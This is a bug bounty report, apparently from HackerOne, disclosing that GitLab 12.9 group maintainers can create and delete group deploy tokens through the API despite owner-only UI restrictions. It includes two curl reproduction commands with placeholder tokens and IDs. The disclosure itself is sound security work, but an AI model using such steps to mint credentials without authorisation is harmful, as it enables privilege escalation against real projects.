Group Maintainers can Create/Delete Deploy tokens using API
HackerOne report #828154 by ashish_r_padelkar
on 2020-03-24, assigned to @dcouture:
Summary
Hello,
New API release in 12.9 of Deploy tokens,A group maintainer is able to create/delete group deploy tokens which i think is not intended. These create/delete functionality is only available to group owners in group settings in UI.
https://docs.gitlab.com/ee/api/deploy_tokens.html#create-a-group-deploy-token
Steps to reproduce
- As a group maintainer, just run the below API
curl --request POST --header "PRIVATE-TOKEN: <Token>" --header "Content-Type: application/json" --data '{"name": "My deploy token", "expires_at": "2098-02-02", "username": "custom-user", "scopes": ["read_repository"]}' "https://gitlab.com/api/v4/groups/<ID>/deploy_tokens/"
-
This will create a group level deploy token.
-
You can also delete the tokens created by group admin using below API
curl --request DELETE --header "PRIVATE-TOKEN: <Token>" "https://gitlab.com/api/v4/groups/<ID>/deploy_tokens/<ID>"
What is the current bug behavior?
Group Maintainers are able to create/delete group deploy tokens
What is the expected correct behavior?
Group Maintainers shouldnt be allowed to create /delete deploy tokens
Output of checks
This bug happens on GitLab.com and probably on omnibus installations too!
Regards,
Ashish
Impact
Group Maintainers are able to create/delete deploy tokens